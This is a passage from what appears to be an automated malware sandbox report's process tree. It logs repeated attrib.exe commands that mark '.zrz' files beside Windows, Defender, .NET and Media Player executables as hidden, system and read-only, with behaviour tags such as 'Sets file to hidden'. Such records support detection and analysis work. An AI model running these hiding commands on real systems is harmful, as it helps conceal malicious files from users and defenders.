        8⤵
        
        PID:2800
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.zrz"
        8⤵
        
        PID:1416
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regsql.zrz"
        8⤵
        
        PID:1312
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_wp.zrz"
        8⤵
        
        PID:2980
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.zrz"
        8⤵
        
        PID:2668
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.zrz"
        8⤵
        
        PID:2516
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.zrz"
        8⤵
        
        PID:2728
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.zrz"
        8⤵
        
        PID:1612
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.zrz"
        8⤵
        
        PID:2200
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.zrz"
        8⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\ilasm.zrz"
        8⤵
        
        PID:2624
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.zrz"
        8⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.zrz"
        8⤵
        
        PID:892
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.zrz"
        8⤵
        
        PID:2124
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.zrz"
        8⤵
        
        PID:1996
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\ConvertInkStore.zrz"
        7⤵
        
        PID:2888
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\FlickLearningWizard.zrz"
        7⤵
        
        PID:2692
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\InkWatson.zrz"
        7⤵
        
        PID:2192
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.zrz"
        7⤵
        Views/modifies file attributes
        
        PID:1612
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\mip.zrz"
        7⤵
        Views/modifies file attributes
        
        PID:1732
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.zrz"
        7⤵
        
        PID:1908
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\TabTip.zrz"
        7⤵
        
        PID:1648
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\MSInfo\msinfo32.zrz"
        7⤵
        
        PID:2000
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\DVD Maker\DVDMaker.zrz"
        7⤵
        
        PID:2464
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\iediagcmd.zrz"
        7⤵
        
        PID:2780
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\ieinstal.zrz"
        7⤵
        
        PID:2840
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\ielowutil.zrz"
        7⤵
        
        PID:676
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\iexplore.zrz"
        7⤵
        
        PID:736
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Defender\MpCmdRun.zrz"
        7⤵
        
        PID:2680
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Defender\MSASCui.zrz"
        7⤵
        
        PID:680
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Journal\Journal.zrz"
        7⤵
        
        PID:2284
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Journal\PDIALOG.zrz"
        7⤵
        Views/modifies file attributes
        
        PID:972
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\wab.zrz"
        7⤵
        
        PID:1504
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\wabmig.zrz"
        7⤵
        
        PID:2928
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\WinMail.zrz"
        7⤵
        Sets file to hidden
        
        PID:1560
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\setup_wm.zrz"
        7⤵
        
        PID:2496
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmlaunch.zrz"
        7⤵
        
        PID:432
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpconfig.zrz"
        7⤵
        
        PID:1224
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\WMPDMC.zrz"
        7⤵
        
        PID:2632
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpenc.zrz"
        7⤵
        
        PID:548
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmplayer.zrz"
        7⤵
        
        PID:2112
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpnetwk.zrz"
        7⤵
        
        PID:2128
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpnscfg.zrz"
        7⤵
        Sets file to hidden
        
        PID:1080
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmprph.zrz"
        7⤵
        
        PID:1928
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpshare.zrz"
        7⤵
        
        PID:2980
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\WMPSideShowGadget.zrz"
        7⤵
        
        PID:984
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows NT\Accessories\wordpad.zrz"
        7⤵
        Views/modifies file attributes
        
        PID:2784
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Photo Viewer\ImagingDevices.zrz"
        7⤵
        Views/modifies file attributes
        
        PID:2780
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Sidebar\sidebar.zrz"
        7⤵
        
        PID:560
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\ink\pipanel.zrz"
        7⤵
        
        PID:2568
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\ink\TabTip32.zrz"
        7⤵
        
        PID:1064
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.zrz"
        7⤵
        
        PID:1692
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Common Files\microsoft shared\ink\mip.zrz"
        7⤵
        Views/modifies file attributes
        
        PID:2672
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\ieinstal.zrz"
        7⤵
        
        PID:1652
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\ExtExport.zrz"
        7⤵
        
        PID:2792
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\ielowutil.zrz"
        7⤵
        
        PID:2632
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Internet Explorer\iexplore.zrz"
        7⤵
        
        PID:2376
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Mail\wabmig.zrz"
        7⤵
        Drops file in Program Files directory
        
        PID:2900
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Mail\wab.zrz"
        7⤵
        
        PID:2284
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Mail\WinMail.zrz"
        7⤵
        
        PID:600
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\setup_wm.zrz"
        7⤵
        
        PID:1696
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\WMPDMC.zrz"
        7⤵
        
        PID:704
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmpenc.zrz"
        7⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmpconfig.zrz"
        7⤵
        
        PID:1000
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmlaunch.zrz"
        7⤵
        
        PID:936
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmplayer.zrz"
        7⤵
        Sets file to hidden
        
        PID:1568
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmpshare.zrz"
        7⤵
        
        PID:984
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows NT\Accessories\wordpad.zrz"
        7⤵
        
        PID:1796
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Media Player\wmprph.zrz"
        7⤵
        
        PID:1936
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.zrz"
        7⤵
        
        PID:3028
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files (x86)\Windows Sidebar\sidebar.zrz"
        7⤵
        
        PID:2760
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.zrz"
        7⤵
        
        PID:2508
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Boot\PCAT\memtest.zrz"
        7⤵
        Sets file to hidden
        
        PID:1532
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\CreateDisc\SBEServer.zrz"
        7⤵
        Sets file to hidden
        
        PID:2588
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\wow\ehexthost32.zrz"
        7⤵
        
        PID:1796
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehexthost.zrz"
        7⤵
        
        PID:2740
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehmsas.zrz"
        7⤵
        
        PID:2132
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehprivjob.zrz"
        7⤵
        Sets file to hidden
        
        PID:1964
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehrec.zrz"
        7⤵
        
        PID:1200
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehrecvr.zrz"
        7⤵
        
        PID:2996
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehsched.zrz"
        7⤵
        
        PID:2552
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehshell.zrz"
        7⤵
        
        PID:2500
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehtray.zrz"
        7⤵
        Sets file to hidden
        
        PID:1996
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\loadmxf.zrz"
        7⤵
        
        PID:1724
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\ehvid.zrz"
        7⤵
        
        PID:1648
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\mcGlidHost.zrz"
        7⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\mcspad.zrz"
        7⤵
        
        PID:1804
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\McrMgr.zrz"
        7⤵
        Views/modifies file attributes
        
        PID:432
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\mcupdate.zrz"
        7⤵
        
        PID:2980
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\Mcx2Prov.zrz"
        7⤵
        
        PID:2876
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\McxTask.zrz"
        7⤵
        
        PID:2444
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\MediaCenterWebLauncher.zrz"
        7⤵
        
        PID:736
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\RegisterMCEApp.zrz"
        7⤵
        
        PID:1900
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\ehome\WTVConverter.zrz"
        7⤵
        Sets file to hidden
        
        PID:3024
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\oisicon.zrz"
        7⤵
        Sets file to hidden
        
        PID:2996
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\outicon.zrz"
        7⤵
        
        PID:2852
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\pptico.zrz"
        7⤵
        Views/modifies file attributes
        
        PID:2916
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\pubs.zrz"
        7⤵
        Sets file to hidden
        
        PID:1572
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\wordicon.zrz"
        7⤵
        
        PID:1000
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Installer\{90140000-0011-0000-0000-0000000FF1CE}\xlicons.zrz"
        7⤵
        
        PID:1528
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Installer\{90140000-006E-0409-0000-0000000FF1CE}\misc.zrz"
        7⤵
        Views/modifies file attributes
        
        PID:2416
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\SC_Reader.zrz"
        7⤵
        
        PID:1452
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Workflow.Compiler\v4.0_4.0.0.0__31bf3856ad364e35\Microsoft.Workflow.Compiler.zrz"
        7⤵
        
        PID:1704
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\AppLaunch.zrz"
        7⤵
        
        PID:2424
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regbrowsers.zrz"
        7⤵
        Views/modifies file attributes
        
        PID:828
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.zrz"
        7⤵
        
        PID:560
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.zrz"
        7⤵
        
        PID:2296
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regsql.zrz"
        7⤵
        
        PID:2024
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_wp.zrz"
        7⤵
        
        PID:1620
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.zrz"
        7⤵
        
        PID:2936
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.zrz"
        7⤵
        
        PID:1688
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.zrz"
        7⤵
        
        PID:2072
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.zrz"
        7⤵
        
        PID:524
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.zrz"
        7⤵
        
        PID:2036
        
        C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.zrz"
        7⤵
        
        PID:756
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\ConvertInkStore.zrz"
        6⤵
        
        PID:1660
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\FlickLearningWizard.zrz"
        6⤵
        
        PID:1516
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\InkWatson.zrz"
        6⤵
        Views/modifies file attributes
        
        PID:2484
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.zrz"
        6⤵
        
        PID:2072
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\mip.zrz"
        6⤵
        Views/modifies file attributes
        
        PID:2572
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\TabTip.zrz"
        6⤵
        
        PID:2668
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.zrz"
        6⤵
        
        PID:2064
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Common Files\Microsoft Shared\MSInfo\msinfo32.zrz"
        6⤵
        
        PID:1904
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\DVD Maker\DVDMaker.zrz"
        6⤵
        
        PID:2244
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\iediagcmd.zrz"
        6⤵
        Views/modifies file attributes
        
        PID:1636
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\ieinstal.zrz"
        6⤵
        
        PID:2860
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\ielowutil.zrz"
        6⤵
        
        PID:2340
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Internet Explorer\iexplore.zrz"
        6⤵
        
        PID:1560
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Defender\MpCmdRun.zrz"
        6⤵
        Views/modifies file attributes
        
        PID:1892
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Journal\Journal.zrz"
        6⤵
        
        PID:2208
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Defender\MSASCui.zrz"
        6⤵
        
        PID:2428
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Journal\PDIALOG.zrz"
        6⤵
        
        PID:704
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\wab.zrz"
        6⤵
        
        PID:2376
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\wabmig.zrz"
        6⤵
        Views/modifies file attributes
        
        PID:2392
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Mail\WinMail.zrz"
        6⤵
        
        PID:2796
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\setup_wm.zrz"
        6⤵
        
        PID:2960
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmlaunch.zrz"
        6⤵
        
        PID:2576
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpconfig.zrz"
        6⤵
        
        PID:1812
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\WMPDMC.zrz"
        6⤵
        
        PID:2100
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpenc.zrz"
        6⤵
        
        PID:1708
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpnetwk.zrz"
        6⤵
        Views/modifies file attributes
        
        PID:2832
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmplayer.zrz"
        6⤵
        
        PID:2972
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmprph.zrz"
        6⤵
        Sets file to hidden
        
        PID:2780
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpnscfg.zrz"
        6⤵
        
        PID:2740
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\wmpshare.zrz"
        6⤵
        
        PID:1704
      - C:\Windows\SysWOW64\attrib.exe
        
        "C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Program Files\Windows Media Player\WMPSideShowGadget.zrz"
        6⤵
        
        PID:736
      - C:\Windows\SysWOW64\attrib.exe
        
